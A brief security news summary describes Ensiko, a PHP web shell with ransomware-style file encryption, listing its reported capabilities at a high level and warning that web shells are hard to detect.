Not exactly ransomware, Ensiko is a PHP web shell with ransomware capabilities.
What’s going on?
The malware is a threat to any system using PHP, such as Windows, Linux, and macOS. This malware can be remotely used by threat actors to control a compromised system and conduct malicious activities.
- Ensiko can execute shell commands on the target system and send back the results to the operators via a PHP reverse shell.
- It scans servers to look for other web shells, deface websites, disclose sensitive information, send mass emails, and download remote files, among other things.
Noteworthy technical details
- The malware can be password-protected.
- The file-encryption component is one of the capabilities that can be used to wage attacks against servers.
- According to the researchers at Trend Micro, the malware uses PHP RIJNDAEL_128 algorithm with CBC mode to encrypt files in a web shell directory.
- Another function includes the recursive overwrite of all files with a specified extension in a directory of a web shell.
- Other capabilities of the malware can be found in the blog post by Trend Micro researchers.
The bottom line is that the use of web shell malware to exploit computer networks has increased. It should be noted that only Internet-connected systems are not the targets, but web shells are frequently deployed on non-Internet facing web servers, such as network device management interfaces or internal content management systems. Moreover, web shells are difficult to identify as they can be easily modified by the operators and several detection methods should be employed to discover such malware in a system.